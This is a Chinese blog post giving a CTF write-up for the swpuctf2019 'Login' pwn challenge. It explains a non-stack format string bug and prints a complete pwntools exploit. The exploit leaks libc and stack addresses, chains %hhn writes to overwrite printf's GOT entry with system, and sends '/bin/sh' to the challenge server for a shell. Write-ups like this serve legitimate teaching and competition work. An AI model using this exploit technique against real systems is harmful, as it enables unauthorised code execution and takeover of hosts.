swpuctf2019 Login pwn详细题解

最新推荐文章于 2024-02-21 19:39:40 发布
最新推荐文章于 2024-02-21 19:39:40 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/103458308
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Login

这是swpuctf2019的第二道pwn题,主要考点就是非栈上的字符串格式化漏洞利用

首先,我们检查一下程序的保护机制

PIE和RELRO没有开启,那么我们可以轻易的利用漏洞修改GOT表

我们用IDA分析一下

在这里,有一个明显的格式化字符串漏洞,由于s1不是在栈上,而是在bss段里,所以漏洞利用起来会比栈上的字符串格式化漏洞稍微繁琐一些。由于外层是一个死循环,所以,我们不能用ROP来解,我们可以把printf的GOT表内容修改为system的地址,然后,我们输入/bin/sh字符串,就可以getshell。

并且要注意,我们必须一次性的完成printfgot表修改操作,不能分步,因为分步的话第一次修改了部分数据,printf的GOT表已经不再指向printf函数,所以第二次就利用不了了。

可以泄露一些栈上的数据,来计算libc的地址

  1. #泄露__libc_start_main的地址  
  2. sh.sendlineafter('Please input your password:','%15$p')  
  3.   
  4. sh.recvuntil('0x')  
  5. __libc_start_main_addr = int(sh.recvuntil('\n',drop=True),16) - 0xF1  
  6. print hex(__libc_start_main_addr)  
  7. libc = LibcSearcher('__libc_start_main',__libc_start_main_addr)  
  8. libc_base = __libc_start_main_addr - libc.dump('__libc_start_main')  
  9. system_addr = libc_base + libc.dump('system')  
  10. print 'libc_base=',hex(libc_base)  
  11. print 'system_addr=',hex(system_addr)  

现在,有了一些需要的地址了,我们考虑怎么来写printf的GOT表,常规的栈格式化字符串漏洞,我们只需将地址放入字符串即可,因为字符串存在了栈里,但是非栈上的字符串,我们就不能这样操作了,我们需要借助格式化漏洞,先修改栈里的数据,改成需要的地址。

我们%6$hhn来修改%10$处的数据,然后利用%10$hhn来修改%14$处的数据,使得%14$处为printfGOT表地址,同样的方法,让%15$处为printf_got + 1的值,这样,我们在printf里用%14$hhn和%15$hn一次性完成对printf的got表数据后3字节完成了修改。第一个字节不用修改,因为都是一样的值。

为了完成这个操作,我们就还需要泄露栈的地址

  1. sh.sendlineafter('Try again!\n','%6$p')  
  2. sh.recvuntil('0x')  
  3. stack_addr0 = int(sh.recvuntil('\n',drop=True),16)  
  4. print hex(stack_addr0)  
  5. sh.sendlineafter('Try again!\n','%10$p')  
  6. sh.recvuntil('0x')  
  7. stack_addr1 = int(sh.recvuntil('\n',drop=True),16)  
  8. print hex(stack_addr1)  

接下来,我们要在14处写入printf的got表地址0x804B014

  1. #写栈14$处的低1字节为0x14  
  2. payload = '%' + str(0x14) + 'c%10$hhn'  
  3. sh.sendlineafter('Try again!\n',payload)  
  4. #变更10处的地址,+1  
  5. payload = '%' + str( (stack_addr1 & 0xFF) + 1) + 'c%6$hhn'  
  6. sh.sendlineafter('Try again!\n',payload)  
  7. #写栈14$处的低2字节为0xB0  
  8. payload = '%' + str(0xB0) + 'c%10$hhn'  
  9. sh.sendlineafter('Try again!\n',payload)  
  10.   
  11. #变更10处的地址,+2  
  12. payload = '%' + str( (stack_addr1 & 0xFF) + 2) + 'c%6$hhn'  
  13. sh.sendlineafter('Try again!\n',payload)  
  14. #写栈14$处的低3字节为0x04  
  15. payload = '%' + str(0x04) + 'c%10$hhn'  
  16. sh.sendlineafter('Try again!\n',payload)  
  17.   
  18. #变更10处的地址,+3  
  19. payload = '%' + str( (stack_addr1 & 0xFF) + 3) + 'c%6$hhn'  
  20. sh.sendlineafter('Try again!\n',payload)  
  21. #写栈14$处的低4字节为0x08  
  22. payload = '%' + str(0x08) + 'c%10$hhn'  
  23. sh.sendlineafter('Try again!\n',payload)  

接下来,我们要往15处写入printf_got+1的值,那么需要将%10$指向%15$处,也就是14的地址+4

  1. ############$15处存入printf_got+1################  
  2. #偏移4,指向$15  
  3. stack_addr1 = stack_addr1 + 4  
  4. payload = '%' + str( (stack_addr1 & 0xFF)) + 'c%6$hhn'  
  5. sh.sendlineafter('Try again!\n',payload)  

接下来,就是一样的操作了,在15处写数据0x804B015

  1. #写栈15$处的低1字节为0x15  
  2. payload = '%' + str(0x15) + 'c%10$hhn'  
  3. sh.sendlineafter('Try again!\n',payload)  
  4. #变更10处的地址,+1  
  5. payload = '%' + str( (stack_addr1 & 0xFF) + 1) + 'c%6$hhn'  
  6. sh.sendlineafter('Try again!\n',payload)  
  7. #写栈14$处的低2字节为0xB0  
  8. payload = '%' + str(0xB0) + 'c%10$hhn'  
  9. sh.sendlineafter('Try again!\n',payload)  
  10.   
  11. #变更10处的地址,+2  
  12. payload = '%' + str( (stack_addr1 & 0xFF) + 2) + 'c%6$hhn'  
  13. sh.sendlineafter('Try again!\n',payload)  
  14. #写栈14$处的低3字节为0x04  
  15. payload = '%' + str(0x04) + 'c%10$hhn'  
  16. sh.sendlineafter('Try again!\n',payload)  
  17.   
  18. #变更10处的地址,+3  
  19. payload = '%' + str( (stack_addr1 & 0xFF) + 3) + 'c%6$hhn'  
  20. sh.sendlineafter('Try again!\n',payload)  
  21. #写栈14$处的低4字节为0x08  
  22. payload = '%' + str(0x08) + 'c%10$hhn'  
  23. sh.sendlineafter('Try again!\n',payload)  

现在,栈里%14$和%15$就布下了我们需要的目标地址了,为了防止出错,我们把%10$处的数据复原

  1. #复原10处的数据  
  2. payload = '%' + str( ((stack_addr1-4) & 0xFF)) + 'c%6$hhn'  
  3. sh.sendlineafter('Try again!\n',payload)  

然后,我们就要一次性的改写printf的GOT表

  1. #现在%14$处存着的就是printfGOT表地址  
  2. #我们开始来改写GOT  
  3.   
  4. #需要一次性将printfgot修改为system  
  5. #写低1字节  
  6. payload = '%' + str(system_addr & 0xFF) + 'c%14$hhn'  
  7. #写低23字节  
  8. payload += '%' + str(((system_addr & 0xFFFF00)>>8)-0x10) + 'c%15$hn'  
  9. sh.sendlineafter('Try again!\n',payload)  

接下来,我们就可以getshell了

  1. #getshell  
  2. time.sleep(0.5)  
  3. sh.sendline('/bin/sh')  

综上,我们对非栈上的格式化字符串漏洞总结:

借助几个栈里的ebp,改写栈里的数据为目标地址,然后就可以像常规格式化字符串漏洞一样操作了。

贴上完整的exp代码

  1. #coding:utf8  
  2. from pwn import *  
  3. from LibcSearcher import *  
  4. import time  
  5.   
  6. #sh = process('./login')  
  7. sh = remote('108.160.139.79',9090)  
  8. elf = ELF('./login')  
  9. printf_got = 0x804B014  
  10.   
  11. sh.sendafter('Please input your name: \n','zhaohai')  
  12.   
  13. #泄露__libc_start_main的地址  
  14. sh.sendlineafter('Please input your password:','%15$p')  
  15.   
  16. sh.recvuntil('0x')  
  17. __libc_start_main_addr = int(sh.recvuntil('\n',drop=True),16) - 0xF1  
  18. print hex(__libc_start_main_addr)  
  19. libc = LibcSearcher('__libc_start_main',__libc_start_main_addr)  
  20. libc_base = __libc_start_main_addr - libc.dump('__libc_start_main')  
  21. system_addr = libc_base + libc.dump('system')  
  22. print 'libc_base=',hex(libc_base)  
  23. print 'system_addr=',hex(system_addr)  
  24.   
  25.   
  26. sh.sendlineafter('Try again!\n','%6$p')  
  27. sh.recvuntil('0x')  
  28. stack_addr0 = int(sh.recvuntil('\n',drop=True),16)  
  29. print hex(stack_addr0)  
  30. sh.sendlineafter('Try again!\n','%10$p')  
  31. sh.recvuntil('0x')  
  32. stack_addr1 = int(sh.recvuntil('\n',drop=True),16)  
  33. print hex(stack_addr1)  
  34.   
  35. #写栈14$处的低1字节为0x14  
  36. payload = '%' + str(0x14) + 'c%10$hhn'  
  37. sh.sendlineafter('Try again!\n',payload)  
  38. #变更10处的地址,+1  
  39. payload = '%' + str( (stack_addr1 & 0xFF) + 1) + 'c%6$hhn'  
  40. sh.sendlineafter('Try again!\n',payload)  
  41. #写栈14$处的低2字节为0xB0  
  42. payload = '%' + str(0xB0) + 'c%10$hhn'  
  43. sh.sendlineafter('Try again!\n',payload)  
  44.   
  45. #变更10处的地址,+2  
  46. payload = '%' + str( (stack_addr1 & 0xFF) + 2) + 'c%6$hhn'  
  47. sh.sendlineafter('Try again!\n',payload)  
  48. #写栈14$处的低3字节为0x04  
  49. payload = '%' + str(0x04) + 'c%10$hhn'  
  50. sh.sendlineafter('Try again!\n',payload)  
  51.   
  52. #变更10处的地址,+3  
  53. payload = '%' + str( (stack_addr1 & 0xFF) + 3) + 'c%6$hhn'  
  54. sh.sendlineafter('Try again!\n',payload)  
  55. #写栈14$处的低4字节为0x08  
  56. payload = '%' + str(0x08) + 'c%10$hhn'  
  57. sh.sendlineafter('Try again!\n',payload)  
  58.   
  59.   
  60. ############$15处存入printf_got+1################  
  61. #偏移4,指向$15  
  62. stack_addr1 = stack_addr1 + 4  
  63. payload = '%' + str( (stack_addr1 & 0xFF)) + 'c%6$hhn'  
  64. sh.sendlineafter('Try again!\n',payload)  
  65. #写栈15$处的低1字节为0x15  
  66. payload = '%' + str(0x15) + 'c%10$hhn'  
  67. sh.sendlineafter('Try again!\n',payload)  
  68. #变更10处的地址,+1  
  69. payload = '%' + str( (stack_addr1 & 0xFF) + 1) + 'c%6$hhn'  
  70. sh.sendlineafter('Try again!\n',payload)  
  71. #写栈14$处的低2字节为0xB0  
  72. payload = '%' + str(0xB0) + 'c%10$hhn'  
  73. sh.sendlineafter('Try again!\n',payload)  
  74.   
  75. #变更10处的地址,+2  
  76. payload = '%' + str( (stack_addr1 & 0xFF) + 2) + 'c%6$hhn'  
  77. sh.sendlineafter('Try again!\n',payload)  
  78. #写栈14$处的低3字节为0x04  
  79. payload = '%' + str(0x04) + 'c%10$hhn'  
  80. sh.sendlineafter('Try again!\n',payload)  
  81.   
  82. #变更10处的地址,+3  
  83. payload = '%' + str( (stack_addr1 & 0xFF) + 3) + 'c%6$hhn'  
  84. sh.sendlineafter('Try again!\n',payload)  
  85. #写栈14$处的低4字节为0x08  
  86. payload = '%' + str(0x08) + 'c%10$hhn'  
  87. sh.sendlineafter('Try again!\n',payload)  
  88.   
  89. #复原10处的数据  
  90. payload = '%' + str( ((stack_addr1-4) & 0xFF)) + 'c%6$hhn'  
  91. sh.sendlineafter('Try again!\n',payload)  
  92.   
  93.   
  94. #现在%14$处存着的就是printfGOT表地址  
  95. #我们开始来改写GOT  
  96.   
  97. #需要一次性将printfgot修改为system  
  98. #写低1字节  
  99. payload = '%' + str(system_addr & 0xFF) + 'c%14$hhn'  
  100. #写低23字节  
  101. payload += '%' + str(((system_addr & 0xFFFF00)>>8)-0x10) + 'c%15$hn'  
  102. sh.sendlineafter('Try again!\n',payload)  
  103. #getshell  
  104. time.sleep(0.5)  
  105. sh.sendline('/bin/sh')  
  106.   
  107. sh.interactive()  
ha1vk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-6
weixin_44145820的博客
04-14 821
目录picoctf_2018_are you rootciscn_2019_final_2 picoctf_2018_are you root 例行安全检查 菜单如下: 我们需要auth_level等于5才能get flag user结构体如下 struct USER{ char *name; long long auth_level; } 漏洞原理分析: 在login中分配了两次内存...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二进制反汇编、密码学、隐写术等。每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得积分。比赛通常在一定的时间内进行,参赛者可以单独或组队参加。 此外,CTF题库也提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。在比赛中,参赛者可以学习新的技能,了解新的安全趋势,并结识志同道合的人。此外,CTF比赛也是一种很好的锻炼方式,能够帮助参赛者提高解决问题的能力和团队协作能力。 CTF题库是学习和提高网络安全技能的极好途径。它们提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。如果您对网络安全感兴趣,请尝试参加一个CTF比赛或挑战集,它们将为您提供有趣和具有挑战性的体验。
逆向分析——2022KCTF秋季赛第六题详解
qq_45307564的博客
12-26 503
刚入门逆向试着复现一道CTF题,大佬们的文章省去了一些步骤(作者太菜了…),在这里记录详细的步骤。
ctf多题 login level1 RE
最新发布
2302_80106308的博客
02-21 785
这个代码是这次加密的关键, replace()函数在两个参数中用后一个替换了前一个,而function函数中的fromCharCode()函数的作用即在这里判断判断c是大于Z,还是小于等于Z;print(chr(flag[i-1] >> i), end='')//奇数,打印flag中的相应值右移i位的结果(除以i个2)print(chr(flag[i-1] // i),end='')//偶数,打印由flag中的相应值除以i整数的字符。= 0 )//分离奇数和偶数,是个重点。
BugkuCTF-WEB题login1
am_03的博客
08-29 1255
知识点 存在SQL约束攻击的网站,注册时通过数据库已有账户例如admin+大量空格,随意密码点击注册,后端先在数据库查找select,将已有账户扩充相同长度,已有账户与注册账户(有大量空格)不等,因为有效长度不同(已有账户扩充的长度不为有效长度),之后插入insert,截断注册账户的多余长度,但后面为大量的空格,由于在SQL里执行字符串处理时,字符串末尾的空格符将会被删除,所以最后插入的注册账户即为已有账户admin,密码成为注册时的密码,即可成功登陆。 补充: 简单来说:就是在注册页面通过大量空格来超过s
buuctf习题pwn(11~20)
yw__y的博客
06-04 347
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 1951
经典栈溢出漏洞
i春秋CTF训练 Web Login
椰奶冻不安全的博客
07-04 4437
Web Login 题目内容:加油,我看好你 本题由擂主Wfox提供 题目链接请在i春秋申请 访问发现是个登录页面,还以为是爆破弱口令,结果在页面源码里看到一行注释 <!-- test1 test1 --> 试了一下成功登录,然后重定向到了member.php页面,发现页面里啥也没有 只能用burpsuite抓包看看了,然后在response的headers里发现可疑参数show 然后在request的headers里添加一个show参数,值设置为1,发送,页面返回了php源码
[第六章 CTFPWN章]n1ker
yongbaoii的博客
04-18 546
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
CTF PWN 武器库题
12-12
CTF PWN 武器库题或rifle题,利用fastbin堆溢出得shell,
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BugKuCTF中套路满满的题-------login3(SKCTF)
qq_42133828的博客
02-09 3008
根据题目给的提示,无疑是基于bool的盲注,而关于盲注的一般都与脚本有关,毕竟很少人会去一个一个猜 然而,再用脚本解决这个问题时,也需要找到准确的注入语句,否则,白费。。。 首先进入页面一试用户名为admin,发现密码报错(说明此用户存在,那么关键的问题就是密码了。。): 再构造语句,进行几次的基于bool盲注的注入,查看一下有没有绕过一些特殊的语句 username='^(1)^1...
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3372
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
百度杯”CTF比赛 十月场 login
Naptmn的博客
11-16 850
1、打开题目 打开题目发现是登录窗口,之后f12发现疑似账号密码的东西,之后输入发现确实是账号密码。 登录之后发现了一串颜文字。 2、bp抓包 因为已经找到了账号密码,所以大概率就不是注入了。之后考虑302跳转,所以进行bp抓包(记得抓的是登录后的包!!!别抓错了)。 并没有跳转,但是在response中发现一个奇怪的参数show:0,考虑是不是应该把他放到包里再来一次。试试就试试。 传递方式注意的是:上面的网址看清楚(我不知道为什么会莫名多出来几个包) show:后面加个空格 之后看response
Bugku-CTFlogin3(SKCTF)(基于布尔的SQL盲注)
weixin_30593443的博客
07-12 416
Day41 login3(SKCTF) http://123.206.31.85:49167/ flag格式:SKCTF{xxxxxxxxxxxxx} hint:基于布尔的SQL盲注 本题要点:异或运算、布尔盲注、过滤 打开是一个登录窗口 用bp抓一下包 发送至repeater 没什么新发现........ 随便试试其他用户名,...
Bugku Web CTF-login1(SKCTF
No Title
01-03 525
Bugku Web CTF-login1(SKCTF) 该题打开是一个登录页面,仔细看看还有注册的功能。看了看题目的提示,SQL约束攻击。 于是去搜索了一下约束攻击相关资料,看这篇文章讲的比较详细基于约束的SQL攻击。 大概意思就是,SQL在处理字符串数据时,会“贴心”的将末尾的空格字符除掉,即"admin"等同于"admin "。比如下面这句话: SELECT * FROM users WHER...
BUUCTF-PWN刷题记录-22
weixin_44145820的博客
05-18 653
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
ctf pwn 计算器
10-05
引用是一段代码,它使用了Python的pwn库来进行CTF中的pwn攻击。pwn攻击是指通过分析程序本身的漏洞,编写利用脚本来获取主机权限。这种攻击需要对程序进行深入分析,了解操作系统的特性和相关漏洞。因此,CTF pwn攻击是一个相对较难的领域。 对于你提到的"计算器",如果你是指CTF中的pwn题目中的一个计算器程序,那么你需要先进行程序的分析,找到可能存在的漏洞点。一旦找到漏洞点,你可以通过构造特定输入来利用漏洞,从而获取权限。 在学习CTF pwn攻击时,首先要有扎实的基础知识,包括C语言、汇编语言、Python编程、操作系统原理和Linux操作等方面的知识。这些基础知识将为你提供分析和理解程序的能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值